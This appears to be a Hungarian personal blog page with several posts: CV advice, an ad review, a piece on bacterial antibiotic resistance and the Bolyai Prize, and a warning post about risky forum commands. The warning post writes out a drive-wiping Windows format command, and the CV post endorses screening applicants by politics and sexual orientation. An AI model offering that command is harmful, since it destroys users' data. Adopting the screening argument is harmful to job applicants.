About...

Napi betevő adag elírás, elütés és helyesírási hiba egy helyen! Amúgy meg #információbiztonság #webcserkészet néha #élettudomány

bardóczi ákos @post.r

blogavatar

minőségi kontent-egyveleg

RSS

cimketenger

ITsec (37),privacy (17),Facebook (17),social media (11),itsec (11),egyéb (10),social web (9),biztonság (8),mobil (8),OSINT (6),jog (6),magánszféra (6),tudomány (6),szellemi tulajdon (6),Google (5),molbiol (5),felzárkóztató (5),webcserkészet (5),szájbarágó (5),plágium (4),Nobel-díj (4),kriminalisztika (4),terrorizmus (4),kultúra (4),big data (4),email (4),genetika (3),pszichológia (3),molekuláris biológia (3),biztonságpolitika (3),CRISPR (3),Android (3),online marketing (3),sajtó (3),élettudomány (3),gépi tanulás (3),Onedrive (3),üzenetküldés (3),jelszó (3),2015 (3),orvosi-fiziológiai (3),Apple (3),Gmail (3),reklám (3),konferencia (3),webkettő (3),biztonságtudatosság (3),kriptográfia (3),levelezés (3),magatartástudomány (3),azelsosprint (3),popszakma (3),hype (3),open source intelligence (3),torrent (3),nyelvtechnológia (3),bejutas (2),tweak (2),villámokosság (2),cas9 (2),Yoshinori Ohsumi (2),Hacktivity (2),génterápia (2),fiziológia (2),természetes nyelvfeldolgozás (2),Reblog Sprint (2),bűnügy (2),Pécs (2),nyílt forrású információszerzés (2),webkamera (2),deep web (2),P2P (2),Netacademia (2),arcfelismerés (2),DDoS (2),Balabit (2),bűnüldözés (2),TOR (2),kulturális evolúció (2),ransomware (2),hitelesítés (2),SPF (2),Whatsapp (2),neuropszichológia (2),szabad információáramlás (2),FUD (2),DKIM (2),2-FA (2),bolyai-díj 2015 (2),molekuláris genetika (2),jövő (2),sudo (2),IDC (2),cyberbullying (2),social engineering (2),malware (2),tartalomszolgáltatás (2),meetup (2),facebook (2),reblog (2),videó (2),titkosítás (2),kutatás (2),epic fail (2),pedofília (2),netkultúra (2),nyelvtudomány (2),vírus (2),hírszerzés (2),iOS (2),farmakológia (2),szociálpszichológia (2),tanulás (2),biológia (2),gépház (2),bulvár (2),bug (2),Tinder (2),öröklődő betegség (2),Yandex (2),könyv (2),beszélgetés rögzítése (2),pszeudo-poszt (2),Twitter (2)

A jó, a rossz és a sikeres CV álláskeresésnél


Magyar nyelven is számos oldal foglalkozott már azzal, hogy hogyan érdemes összeállítani a saját életrajzunkat egy-egy pozíció megpályázásánál, ezek közül viszont nagyon sok egyszerűen egy korábban megjelent a Business Insider- vagy a Mashable-cikk átvételei.

Tisztában vagyok vele, hogy ez egy külön tudomány, aminek nem vagyok szakértője, de nyilván vannak megfigyeléseim azzal kapcsolatban, hogy egy CV mikor igazán sikeres és mik azok a hibák, amikre nagyon kell ügyelni. Tehát amit leírok, nyilván nem mond újat a HR-eseknek, a legírásom ráadásul szubjektív is, viszont tapasztalati alapon, sok-sok ismerős életrajzát néztem meg előtte egybevetve azzal, hogy milyen gyorsan, milyen pozíciót sikerült betölteniük illetve én magam is több CV feljavításában segítettem másnak.

1. Mindvégig tartsuk szem előtt, hogy néhány másodperc alatt dől el, hogy egy életrajzot egyáltalán tovább olvas-e a HR-es vagy dobja a kukába, ezért az életrajznak azonnal áttekinthetőnek kell lennie és semmilyen formátumbeli hiba nem engedhető meg! Érthetően, erre gyakorlatilag csak a PDF fájlformátum alkalmas, erre hamarosan visszatérek.

2. Evolúciós pszichológiai kutatások igazolták, hogy egy-egy arcot látva automatikusan kialakul valamilyen képünk arról, akinek a fotóját látjuk, ami aztán tudattalanul bejátszik abba, hogy később hogyan állunk az illető személyéhez. Ugyan ideális esetben, nem túlzott mértékben jelentkezik ez a hatás, mégis érdemes előnyös arcképes fotót választani. Azt, hogy melyik mennyire előnyös, ne te döntsd el, hanem kérdezz meg olyanokat, akiktől többé-kevésbé elvárható, hogy őszintén válaszolnak is rá.

3. Az életrajz tartalmi elemeinél annak megfelelően kell felsorolni az tételeket, amilyen sorrendben az a HR-es számára valószínűleg releváns. Az életrajzot eleve angol nyelven készítsük el, ami szerintem nem szorul magyarázatra.

- Azaz az első a végzettség megjelölése. Abban az esetben, ha egy jól ismert csúcs gimnáziumban végeztél, indokolt lehet annak a beírása, mi több, kimondottan jó pont, hiszen egy nagynevű gimnázium olvasásakor azt az olvasó tudattalanul pozitív értékítéletekkel kapcsolja össze. Viszont ha nem csúcs gimnáziumról van szó, kutyát sem érdekel, be se írd!
- A következő pontban jelöld meg, hogy legjobban mihez értesz. Vigyázat! Csak olyat írj be, amiben tényleg vérprofi vagy, amihez tényleg nagyon értesz, különben a hitelességeddel játszol. Úgy gondolom, hogy akármilyen tehetséges valaki, úgy tényleg vérprofi legfeljebb 3-5 területen lehet, aki ennél többet ír be, az vagy az itt ecsetelt preferencia elveit nem követi vagy szimplán hazudozik. [Egy korábbi Mashable-cikk rendszeresen eszembe jut, ami szerint nagy mintán igazolták, hogy a jelentkező több, mint fele (!!) egyszerűen hazudik az életrajzában.]
- Csak ezt követően érdemes felsorolni, hogy milyen projektekben vettél részt, egészen pontosan mikor, hol vagy kikkel és annak kapcsán milyen technológiákkal kerültél kapcsolatba, milyen módon szereztél tapasztalatot. Itt is és az előző pontban is, ha szakmai tapasztalatokról van szó, olyan konkrétan fogalmazzunk, amilyen tömören, amennyire csak lehet!

példa nagyon rossz megjelölésre:
"linux knowledge" - milyen disztribúció? Milyen szinten? Esetleg hány éve?

példa helyes megjelölésre:
"Ubuntu maintenance (on high-level)" - nyugi, ahova beküldöd, ott tudni fogják, hogy az Ubuntu a linux disztribúciók egyike, nem pedig egy rovarfaj, ha a példánál maradva IT-s pozícióra pályázol. 

- Az utóbbi két szempontra egyaránt igaz, hogy természetesen nem kell minden megismert technológiát, hanem azt, amit a leginkább relevánsnak látsz a betöltendő munkakör szempontjából. [erre szintén visszatérek]

- Hobbik - ezzel kapcsolatban oszlanak meg a legjobban a vélemények, hogy egyáltalán mennyire kell, ha kell, akkor mit ildomos ide írni. Szerintem érdemes, de itt is csak olyan megemlítésével, ami érdekessé tehet a HR-es számára és mutatja felé, hogy nem egy szakbarbár vagy.

- Nyelvismeret - kétségkívül a magyar munkaerőpiacon az egyik legszűkebb keresztmetszet. Egyrészt azért, mert nagyon sokan tényleg nem tudják használni az idegen nyelvet, másrészt azért, mert nagyon sokszor egyszerűen rosszul mérik fel az emberek a saját nyelvtudásuk szintjét. Az, hogy tudod használni az oprendszert, meg a webszolgáltatásokat angol nyelvre állítva és elboldogulsz külföldön a kocsmai rendelésnél, még nem nyelvtudás, csókolom! Ha van nyelvvizsgád, még az sem.

- A nyelvtudáshoz kapcsolódik, hogy a CV-ből nem árt, ha látszódik, hogy mennyire tudsz csapatban dolgozni, milyenek a kommunikációs skilljeid, de az ezzel kapcsolatos pontokat inkább egy-egy példával helyettesítsd, amikor te vezényeltél le egy komplett projektet projektvezetőként vagy mentoráltál egy újoncot. Abba most nem megyek bele, hogy vannak olyan munkakörök, ahol a megállapodásnak megfelelően nem csak azt nem írhatod le, hogy mit dolgoztál és kikkel, de még azt sem, hogy hol.

- Gyengeségek - remek kérdés, hogy helye van-e az életrajzban, szerintem amellett, hogy hitelesebbé tesz, nem kell összeszorított farpofával menni a megpályázott melóhely szakmai kompetenciát felmérő részére. Ha benne van az életrajzomban, hogy beszédhibám van, a pályázó és a megpályázott oldalán is kisebb lesz a feszkó, amikor beszélni kell. Természetesen ésszel kell tálalni, összhangba kell, hogy álljon a megpályázott munkakörrel. Egy riporter számára például fontos a beszéd, a munkakörök többségében meg mellékes.

- Kerüljük a gyilkos közhelyeket, a bullshitelést - amikor egy HR-es az egy adott pozícióra való jelentkezésnél az adott napon már a harmincadik CV-ben olvas olyat, hogy "jó csapatjátékos vagyok", "szeretnék szakmailag továbbfejlődni" és hasonló szörnyszülött fordulatokat, nagyon jó pont lesz, ha a tiédben pont nem. Jó csapatjátékos vagy? Akkor azt egy korábbi példával igazold a szakmai tapasztalatoknál, ahogy előbb írtam. Ha szakmailag szeretnél továbbfejlődni, az abból derül ki, hogy mennyire vagy őszintén kíváncsi az első interjún a melóval és a céggel kapcsolatban. Ha pedig előre ismert a cég, akkor alap, hogy fel kell készülnöd belőlük, amennyire csak tudsz.

4. Manapság már az is elvárható, hogy az elérhetőségek mellett tartalmazza a CV azt a rövidített URL-t, ahonnan a kinyomtatott dokumentum letölthető, ez viszont lehetőség szerint ne Dropbox vagy valami hasonlóan kínosan kommersz fájlmegosztó legyen. Hasonlóan formai dolog, hogy a CV PDF formátumú legyen, hiszen az biztosan megjelenik minden gépen, de természetesen olyan PDF-készítővel printelve, ami nem gányol bele semmit a kinyomtatott dokumentumba. Ahogy a való életben elküldött, de fontos dokumentumokat, így a PDF-et is érdemes aláírni, de digitálisan, még ha nem is egy überhivatalos és fizetős CA-val, de olyannal, ami elegendően egyértelmű módon mutatja, hogy a dokumentumot valóban te írtad alá.
Az ingyenes Comodo certi például email címhez köti ezt, ami jó esetben azonos azzal az email címmel, ami a CV-ben is van. Illik észben tartani, hogy a PDF illetve a digitális aláírás tartalmazza az aláírás idejét, magának a fájlnak a metaadatai pedig azt, hogy a fájlt mikor hozták létre, módosították utoljára valamint a CV jó, ha tartalmazza az utolsó aktualizálás időpontját. Ha az éles szemű HR-es észreveszi, hogy ezek nem harmonizálnak, gondolhat egyszerű technikai hiába, ha viszont olyan helyre pályázol, ahol a technikai pontosság fontos, egy ilyen mozzanattal el is vághatod magad, hiszen ha például a doksiban utolsó aktualizálás idejeként újabb dátum van megadva, mint az utolsó módosítás dátuma, a fejvadász alapos okkal gyanakodhat csalásra.

5. Az egy dolog, hogy van egy csőre töltött CV-d, viszont ha tényleg szeretnél egy munkát, az adott munkakörre kell szabni az életrajzot, azaz a fontossági sorrendet és a tartalmat úgy rendezni, hogy az alapján kidomborodjon, hogy mennyire testreszabott számodra a pozíció.

6. Bizonyított, hogy az email cím formátuma is milyen előítéleteket kelthet, részben tudattalanul. Nem megyek bele, hogy miért szerencsésebb, ha az email címed olyan domainhez kapcsolódik, ami vagy a sajátod vagy nem a sajátod, de nem olyan, ami alól bármikor kipenderíthetnek, ha már valami ingyenes fos szolgáltatóhoz tartozik, akkor legalább az előtagja legyen normális. Azaz jópofa lehet egy jomunkasember1991@gmail.com cím azok szemébe, akik tudják, hogy egy középiskolai, iszonyúan bebaszós osztálykiránduláson ragadt rád ez a név, ráadásul még Árpádnak is hívnak, a HR-esnek az jobban fog tetszeni, ami könnyen megjegyezhető és kérem szépen ne tartalmazzon számjegyet, mert ortó ciki, könnyen félrecímezhető, ráadásul nagyobb valószínűséggel landol spambe a HR-es címzettnél, ilyen módon nagyobb valószínűséggel észre sem fogja venni, hogy küldtél neki CV-t!

7. Mielőtt véglegesítenénk a CV-t olvassuk el még párszor és minden redundáns információt távolítsunk el belőle, ne ismételjük önmagunkat! A válasz sansszát rendkívül mértékben megnöveli, ha a levélhez írunk néhány sort, mondjuk azzal kapcsolatban, hogy hol láttuk a megpályáztatott pozíciót, miért érdekel, még akkor is, ha nem kérnek motivációs levelet.

Lazán kapcsolódik a  CV-íráshoz, inkább már az álláskereséshez, de vegyük figyelembe, hogy bárki bármit is mond, a HR-est igenis érdekli a pályázó emberi oldala is. Korábban még nagyon sokan egész egyszerűen lehazudták, hogy megnéznék a pályázó social webes aktivitását vagy rájuk keresnének a Google-ben, ehhez képest előrelépés, hogy a normálisabbak vállalják, hogy igenis rákeresnek az illetőre és amit látnak, mérvadó is számukra. Elítélendő-e, ha professzionális szempontokon túl a HR-es másra is kíváncsi, esetleg még olyanra is, amire a jog betűje szerint nem szabadna rákérdeznie, ha pedig a HR-esnek eléggé jó szeme van, a közösségi weben tud olvasni a sorok közt, azaz amit csak implicit módon, a tudta nélkül osztott meg valaki?

A rövid válasz: hülye a kérdés, egyáltalán nem elítélendő.

Bővebb válasz: nemhogy elítélendő, hanem elengedhetetlen. Ugyanis ha olyan pozícióba keresnek valakit, aki majd minősített adatokat fog kezelni, viszont a Facebookján az látszik, hogy ész nélkül megoszt mindent képekben, amit lát a fasztortás szülinapozástól kezdve az álburzsuj last minute nyaraláson át a legutóbbi bemarós buliig, egészen egyszerűen nem várható el tőle, hogy a munkájával kapcsolatos adatok ne legyenek esetleg kicsalhatók belőle vagy ne kotyogjon ki üzletmenet-folytonosság szempontjából érzékeny információkat. [Korábban a blogon már beszámoltam róla, hogy az emberi tudat legtöbbször nem tudja hatékonyan megkülönböztetni az érzékeny információt a teljesen publikustól, másrészt az információk érzékeny volta nem állandó dolog.] Ha valakiről levágós, hogy melyik politikai vonalhoz húz, nagyon veszélyes dolog, ugyanis az intelligens HR-est ez ugyan nem érdekli, de tisztában van vele, hogy a megbízó cég HR-esét már igenis érdekelheti. Mégpedig azért, mert legyen ez akár igazságos, akár nem, a céges HR-es nem engedi meg magának azt a kockázatot, hogy egy frissen felvett alkalmazott elkezdjen atommeghajtással politizálni vagy éppenséggel más torkán lenyomni a vallását, amihez tartozik, hiszen ez a produktivitást gátló piszok nagy feszültségforrás.

Az írországi melegházasság eheti megszavazásáról jut eszembe: ahogyan a politikai és vallási beállítódásra, úgy a szexuális beállítódásra is elvben tilos kérdezni, azt figyelembe venni, konkrétan írok egy hipotetikus esetet, amikor a szó szoros értelemben élet-halál kérdés lehet, hogy valaki heteró vagy meleg, leszbi, mittudomén. Tételezzük fel, hogy egy igen komoly céghez felvesznek kapcsolattartó senior consultant pozícióba egy leszbi hölgyet vagy meleg urat, akinek olyan országba kell utaznia majd lobbizás céljából, amilyen állam amúgy feltörekvő, ígéretes piac, viszont a homoszexuális viselkedést börtönnel, az államból kiutasítással büntethetik, elborultabb helyeken halállal. Na már most tegyük fel, hogy emberünk ilyen országba érkezik egy hónapra, aztán elmegy munkaidő után ismerkedni, rosszabb esetben kurvázni, azonos neművel. Ha lebukik, ennek a következménye kevésbé rossz esetben mindössze annyi, hogy az országból kiutasítják, ami egyet jelenthet azzal, hogy a cég a megcélzott piacot el is vesztette. Rosszabb esetben nem csak kiutasítják az országból, de még jól meg is verik.

Az ugye a Wikipedia alapján világos, hogy nem csak a legsötétebb országokban történhet ilyen, tehát nem lehet azt mondani, hogy teljesen ignorálhatók azok a piacok, amiknek a kulturális alapokon nyugvó törvényei és szokásai homlokegyenest ellentmondanak az európainak. Mielőtt valaki jönne azzal a vakon liberális szöveggel, hogy egy-egy ilyen állam "civilizálatlan", na az hasonló kocsmafilozófiai szint, mint amikor valaki virtigli náci szövegekkel áll elő, csak éppen a tartalom más. Ugyanis több antropológiai iskola szerint tudományos szempontból nem értelmezhető az, hogy az egyik kultúra civilizáltabb, a másik pedig kevésbé: Afrika legtöbb államában nem azért verik a melegeket még a hékek is, mert kegyetlenek, gonoszak vagy civilizálatlanok lennének, hanem azért, mert a kultúrájukhoz tartozik.

Aki ezt így nem fogadja el, annak hozok egy analóg példát: számunkra csak az amerikai filmekből lehetnek ismerősök azok a diákszövetségek, mint amilyen az Alpha Epsilon Pi vagy éppen a Phi Kappa Psi, de van még bőven:
http://en.wikipedia.org/wiki/List_of_social_fraternities_and_sororities

Ezeknek ugye egy közös jellemzője, hogy az újoncokat [akik ugye az egyetem legtehetségesebbjei közül kerülnek ki!] olyan - európai szemmel nézve kegyetlen - beavatási rituáléknak teszik ki, amihez képest egy katonai beavatás is eltörpül. Az egy hétig gyakorlatilag szociopata módjára viselkedő felsősöket viszont senki sem nevezné barbárnak, kulturálatlannak, civilizálatlannak, ez egyszerűen az ottani kultúra része, akárcsak az, hogy mennyire kultúrafüggő a többségitől eltérő szexuális orientáció megítélése.

A poszt eredeti témájához visszatérve számtalan olyan emberi faktort fel tudnék még sorolni, ami gyakorlatilag alkalmatlanná tehet valakit a hatékony munkavégzésre, hiszen ha egy cég reprezentatív pozíciójában lévő üzletembernek szólnak, hogy egész nap önteni a lájkvadász oldalakból származó szennyet a Facebookra nem jó ötlet, akkor az a baj, ha nem szólnak neki, akkor meg az a baj, de vegyük észre, hogy mindkét esetben az egész cég látja a kárát.

A végére hagytam valamit, amit végülis teljesen alapvetőnek tekintek: hogy a pályázó maximálisan őszinte. Egy magyar színésznő nyilatkozta egyszer, hogy még akkor sem fog picit sem hazudni, ha emiatt majd jónéhányan megutálják, a 19. században egy amerikai államelnök azt mondta, hogy azért nem hazudna, mert nem eléggé jó a memóriája hozzá, hogy fejben tartsa, hogy mikor mit mondott, ami eltér a valóságtól, így menthetetlenül belegabalyodna, elvesztené a hitelét.

Végülis teljesen mindegy, hogy mi miatt vagyunk őszinték, általánosságba véve a lényeg azon van, hogy az állásinterjún legyünk még őszintébbek, mondjuk azért a szalonképesség határain belül, ami viszont mindenkinél máshol húzódik.

A hitelességgel kapcsolatban megörvendeztetnélek benneteket egy videóval, ami annak idején még nálam is lecsapta a biztosítékot: a Jobline egy állásbörzén senior HR-eseket kérdezett, az elkészült videó alapján pedig azt tudom mondani, hogy ez a videó nagyon gonosz módon lett összevágva vagy azt, hogy a videóban szereplő figurák egy része valami félelmetesen hülye és önmagából indul ki. Több esetben, hangsúlyozva elhangzik a videóban, hogy a nyilvánosan elérhető felületeinken lévő tartalmat rázzuk gatyába és olyanokat posztoljunk, ami a hivatásunkhoz, érdeklődésünkhöz kapcsolódik. Mi a jóég van, már elnézést!!?? Lehet, hogy én nem vagyok normális, de a közösségi webet világ életemben arra használtam, hogy olyanokat posztoljak, ami ténylegesen érdekel, mi több, legyetek erősek: még betépős vagy faszvillantós fotóm sincs. Viszont ez alapján a videó alapján joggal feltételezhetjük, hogy egyik-másik HR-es magából indul ki és burkoltan az a prekoncepciója, hogy a pályázó hazudja le a fél életét és tegyen a helyére olyat, ami jól néz ki... Egy olyan világban, ahol a hitelesség a legnagyobb értékek egyike.

Vigyázat, ha agyi érgörcsöt kapsz a videótól, azért nem vállalok felelősséget.

képek: dopamineproject.org, indevjobs.org, volitionperformance.co.uk, thepoke.co.uk

3 Tovább

Petőfi, Arany és a Microsoft cloud


A Microsoft egészen eredeti módját választotta annak, hogy népszerűsítse az office-os felhőszolgáltatásait illetve a Skype-ot: a pénteken berobbantott reklám arra az alapötletre épít, hogy hogyan dolgozott volna közösen Arany János és Petőfi Sándor, ha az ő korukban elérhetőek lettek volna a MS felhő alapú szolgáltatásai. Mindezt egy letisztult, reszponzív webhelyen keresztül mutatják be, amit egy ideig biztosan nem lehet elfelejteni. Ha csak egy reklámra kattintasz ebben a hónapban, akkor ez legyen az, egyhamar hasonló úgysem lesz!

Avagy végre már egy reklám, ami nem nézi hülyének a megszólítani kívánt célcsoportot, úgy tudja benne megjeleníteni a klasszikus kultúrát, hogy az nem erőltetett és nem is unalmas.

Lehet, hogy korábban tévedtem és a magyar kreatív szakma mégsem menthetetlenül agyhalott.

0 Tovább

10 dolog, amit nem tudtál a baktériumokról és a Bolyai-díjról


Idén Pál Csaba, az MTA Szegedi Biológiai Központjának kutatója kapta a magyar tudomány legmagasabb szintű elismerését, a Bolyai-díjat baktériumokkal kapcsolatos kutatásaiért. 

1. Évek óta tudott, hogy a baktériumok hatóanyagokkal szembeni érzéketlensége az elkövetkező 1-2 évtizedben nagyobb veszélyt jelent majd az emberiségre, mint a terrorizmus

2. A baktériumok antibiotikumokkal szembeni egyre nagyobb ellenálló képessége közismert dolog, az viszont már közel sem, hogy mindez hogyan is történik a természetben. Először is említenék néhány példát azzal kapcsolatban, hogy egy-egy antibiotikum milyen elven is működik.

- A béta-laktámok csoportjába tartozó szerek, mint amilyen a penicilin, a baktérium sejtfalának felépítését gátolják meg egy ehhez szükséges enzim blokkolásával, ilyen módon a baktérium elpusztul. Ugyanakkor az erre érzéketlenné vált baktériumok olyan enzimet fejlesztettek ki, amik magának a béta-laktám molekulának gyűrűjét hasítják el, ilyen módon hatástalanná téve azt, megint más baktériumokban olyan kötőfehérjék jelentek meg, amik megakadályozzák, hogy a hatóanyag működhessen. Egy pillanatig se felejtsük el, hogy mindössze néhány emberöltőnyi evolúcióról van szó!
- Az aminoglikozidok a baktériumokba való bejutás után rákapaszkodnak a fehérjék felépítésében kulcs fontosságú ún. riboszómákra, így a baktérium képtelen lesz fehérjéket termelni, ez okozza a pusztulásukat. Az ilyen szerekkel szembeni rezisztencia alapja ismétcsak az, hogy a baktériumoknak olyan génjei jelentek meg, amiknek a termékei képesek a gyógyszermolekulát módosítani, ráadásul többféleképp is.
- Az imidazol csoport tagjai a baktérium belsejébe bejutás után olyan vegyületté alakulnak át, ami közvetlenül a baktérium DNS-t károsítják, így megakadályozva annak megkettőződését vagy átíródását RNS-re.

Bármilyen hatásmechanizmusú gyógyszert is fejlesztenek ki a kutatók, a természet talál valami még ötletesebb megoldást arra, hogy ezt hogyan hekkelje meg.

3. Nem nagyon foglalkozott vele a sajtó, hogy ténylegesen miért is kapta a Bolyai-díjat Pál Csaba. A baktériumokkal kapcsolatos molekuláris biológiai kutatások jelentősége és fontossága szinte felméretetlen. Egyrészt, a molekuláris biológia születésétől, a 20. század második felétől kezdődően a kutatók a genetikai folyamatok molekuláris mechanizmusait prokariota szervezeteken, konkrétan baktériumokon kezdték el kutatni, mivel egyszerű genommal rendelkező szervezetek lévén ezen keresztül lehetett megérteni azokat az alapvető molekuláris mozzanatokat, amik egyáltalán lehetővé tették, hogy magasabb szintű élőlények molekuláris biológiái működése is érthető és kutatható legyen. A sejtmaggal rendelkező [eukariota] élőlények genomja jóval bonyolultabb, viszont nagyon sokminden úgy vagy nagyon hasonlóan történik, mint a baktériumok esetén, akár a DNS megkettőzéséről, akár a DNS RNS-re való átírásáról, akár az RNS alapján a fehérjék szintéziséről van szó. Ha ma valaki molekuláris genetikát kezd el tanulni, akkor elsőként a baktériumok genetikájával kell megismerkednie. Ezen kívül még mindig számos molekuláris genetikai mechanizmus tisztázásához baktériumokat használnak a kutatásban.

4. A tényleges rezisztencia legtöbbször úgy alakul ki, hogy a baktérium DNS-étől független DNS-szakaszokban, az ún. plazmidokban megjelenik egy-egy mutáció, ami hordozza az önvédelemre használt fehérje génjét, ami az antibiotikumokat hatástalanítja. Természetesen az ellenálló baktériumok ki fogják szorítani azon fajtársaikat, amik nem tettek szert ilyen önvédelmi mechanizmusra. A baktériumoknak természetes ellenségei, a bakteriofágok, azaz olyan vírusok, amik magát a baktériumot nyírják ki azáltal, hogy bejuttatják önmaguk megsokszorozásához szükséges örökítőanyagot, az ilyen módon megkergült baktérium pedig olyan fehérjéket fog termelni, amik a fágvírus szaporodásához szükségesek. Viszont nem csak a fágvírus juttat be örökítőanyagot a baktériumba, hanem esetleg több hiba folytán a fág is kap a baktériumtól. Majd amikor a vírus a következő baktériumot fertőzi meg, könnyen előállhat a régi és az új gének keveredése folytán olyan kombó, ami aztán egy plazmidba épül, így kialakítva a rezisztenciát. [A DNS persze nem csak plazmidba épülhet be]. A fágok ilyen szempontból az evolúció celebjei: potenciálisan hozzák-viszik a géneket esetleg teljesen különböző fajok közt. Amikor valami töketlen GMO-vita folytán azon vannak kiakadva a laikusok, hogy egyik fajból gént átültetni egy másik fajba - persze anélkül, hogy egyáltalán tudnák, hogy mi az a gén - a természettel szembeni bűn, nem tudják, hogy ez a természetben is simán megtörténik magától.

5. A díjátadásról szóló hírt nem egy hírügynökség, hanem a debreceni 4024.hu hozta le elsőként, gyakorlatilag mindenkit beelőzve ezzel a tévé a korábbi évekhez képest a díjátadót nem közvetítette sem élőben, sem később.


6. Pál Csaba csoportja olyan paradigmákat is felhasznál a kutatás során, amiknek módszereivel kapcsolatban korábban kevéssé állt rendelkezésre tapasztalat vagy éppenséggel egész egyszerűen kevesen tudják magas szinten művelni, ezen belül a rendszerbiológiai megközelítést emelném ki, aminek a tényleges alkalmazása egyszerűen a gépek számítási teljesítményének korlátai miatt ütközött akadályokba korábban. Ami sokkal fontosabb, hogy Pál Csaba csoportja a világ egyik legkomolyabb csoportja, amelyik igencsak izmos bioinformatikai módszerekkel vizsgálja a korábban kevésbé ismert mutációk evolúciós szerepét, az új szemléletmódról erre található plusz információ.

7. Az, hogy ki kapja a díjat - szemben például a Kossuth-díjjal - a vendégek számára csak a helyszínen derül ki, egészen addig szinte lehetetlen információt szerezni a díjazott személyéről, akit a díj odaítéléséről informális források szerint legfeljebb néhány héttel korábban tájékoztatnak. A Bolyai-díj díjbizottságának egyik felét a Bolyai-díj Alapítvány, a másik felét az MTA delegálja, a díjbizottság összetételnék egy része szintén nem nyilvános egészen a díjátadóig.

8. Eredetileg az ország legtehetségesebb diákjait összefogó Bolyai Önképző Műhely létrehozásának ötlete a 2000-es díjátadón merült fel a díj alapítói közt, nem sokkal később pedig Somody Imre vezetésével meg is kezdte munkáját a Bolyai Műhely Alapítvány első kuratóriuma. A tehetséggondozó szervezet kuratóriumának és néhány utólag odacsapódott szervezőnek a nézeteltérései miatt a teljes kuratórium 2007 nyarán lemondott, aminek azonnal érződtek a következményei. Olyan fontos alapelvek sérültek, mint például az, hogy a Budapesten kívüli hallgatók lehetőség szerint azonos eséllyel jussanak el az Önképző Műhely programjaira, ami nyilván érzékenyen érintette azokat, akik távolról utaztak oda, de onnantól egyáltalán nem kaptak diákként utiköltség-térítést. A Bolyai Önképző Műhelyt képviselő néhány figura személye, eszelősen zavaros gazdálkodása és vállalhatatlan ideológiai műtermékei máig legendásak a korábban végzett bolyais diákok körében. Alighanem a remek menedzsementnek köszönhetően, a Bolyai Műhely diákjai a 2011-es és 2013-as díjátadóra egész egyszerűen nem kaptak meghívást, a Somodyék-koncepciójából, ha úgy tetszik, az első kuratórium örökségéből pedig semmi sem maradt.  

9. A Bolyai-díjátadók történetében tudomásom szerint a legidiótább sajtótájékoztató 2007-ben volt. Lovász Lászlótól kérdezte elsőként egy újságíró, hogy Lovász profnak mi a véleménye a zenei és matematikai tehetség kapcsolatáról, holott a díjat az iskolateremtő tevékenység mellett a kombinatorika és a gráfelmélet terén elért eredményeiért kapta. Közhelyes és hülye kérdésekkel a jelen lévő újságíróknak körülbelül fele sült fel.

10. Az idei díjátadóra a négy legfontosabb közjogi figura közül a miniszterelnök és a házelnök egész egyszerűen nem jött el, de nem láttam Lenkovics Barnabást, az Alkotmánybíróság elnökét sem. A díjátadóval kapcsolatban több látványos formai változás is történt. 2004-ben az Operában figyelhettem a díjátadót, 2007-ben a kisebb befogadóképességű Vígszínházban, 2009-ben a díjátadónak a Nemzeti Színház adott helyet, a 2011-es és 2013-as nekem kimaradt ugyan, de ekkor már az ideihez hasonlóan a jóval kisebb befogadóképességű MTA főépületben történt a díj átadása.

Köszönet nekik:

új támogató

PR

képek: index.hu, motifolio.com, t-systems.hu, acg.hu

0 Tovább

Eközben a Deák téren


A puhatestűek törzsébe tartozó fajok tagjai bolygónknak csaknem minden részén előfordulnak, így a polipok is. Nem kivétel ez alól a Deák Ferenc tér jegykiadó automatája sem.

0 Tovább

Ne sudózzál! Mondom NE SUDÓZZÁL!


Amúgy ennek a posztnak a kapcsán, Petinek, na meg Gergelynek.

Ha nem jelenik meg minden kép azonnal, nos, ne legyünk telhetetlenek!

0 Tovább

Parancsok, amiket inkább ne próbálj ki otthoni gépen


Alapvető játékszabály, hogy a gépen ne hajtsunk végre olyan műveletet, amiről nem tudjuk, hogy mi a hatása. Mégis nagyon sokan nem tartják be, ha megoldást keresnek valamilyen gépükkel kapcsolatos problémára, aztán beleakadnak egy fórumba, amiben benne van a "tuti megoldás".

Ami eléggé világos, hogy ha valaki ráakad egy olyan fórumtopikra, amiben mondjuk az akadozó flash lejátszóval kapcsolatban osztják meg a tapasztalataikat a felhasználók, hiába javasolja valaki a teljesen tapasztalatlan felhasználónak, hogy windowsos rendszer esetén navigáljon el a Computer ablakba, majd a C jelű meghajtó fölött kattintson jobb egérgombbal, majd a helyi menüben válassza a Format... menüpontot, egyrészt a dolog túl átlátszó, másrészt az operációs rendszer alapértelmezés szerint úgysem engedi, harmadrészt pedig ha valaki nagyon nem ért a géphez, annyire hülye azért mégsem lehet, hogy még akkor is formáz, ha egy ablak figyelmezteti, hogy minden adat visszaállíthatatlanul elveszik a művelettel.
Viszont mi a helyzet azokkal a látszólag tapasztalt felhasználóktól származó "jótét" ötletekkel, amik a laikus számára nem azonnal világosak, a gép nem ír ki semmilyen figyelmeztetést és a gépet szinte biztosan használhatatlanná teszik?

Parancssor ["terminálablak"] ugye minden operációs rendszerben van, aminek a használatában nincs otthon az átlag felhasználó, hiszen eleve ritkán van rá szükség, de itt lehet elérni sokszor olyan funkciókat, amiket a grafikus felhasználói felületen egyáltalán nem, ami pedig a leginkább tündéri benne, hogy nyilván lehet kiadni olyan parancsot, ami a legmagasabb jogosultságok mellett fog lefutni, úgy, hogy semmilyen figyelmeztető üzenetet nem ad.

Például ha valaki azt a szájbarágós ötletet kapja, hogy a Windows 7-ben a Run... menüpont alatt indítsa el a cmd-t, mint a Windows alapértelmezett parancsértelmezőjét, majd írja be a format c: /X /Q parancsot, értelemszerű lenne azt hinnünk, hogy a parancs a C betűjelű meghajtó tartalmát törli, ráadásul gyors módban, a /X pedig arra utasítja, hogy ha valamilyen folyamat használja a meghajtót [nyilván igen, mivel tipikusan innen fut az operációs rendszer], akkor válassza le azt és aztán formázza. A dolog viszont alighanem mégsem fog működni, hiszen alapértelmezés szerint a felhasználó nem rendszergazdaként van belépve, másrészt a Microsoft pont az ilyen veszélyes baromságok kiküszöbölése miatt építette be a Vistától fölfelé mindbe az UAC-megoldást.

Persze a Run as... szolgáltatással a parancs futtatható rendszergazdaként is, a felhasználónak csak-csak feltűnik a figyelmeztetés, hogy a winchestert ledózerolja a kiadott parancs. Formázás helyett persze lehetne particiónálás is, a lényegen nem változtat.

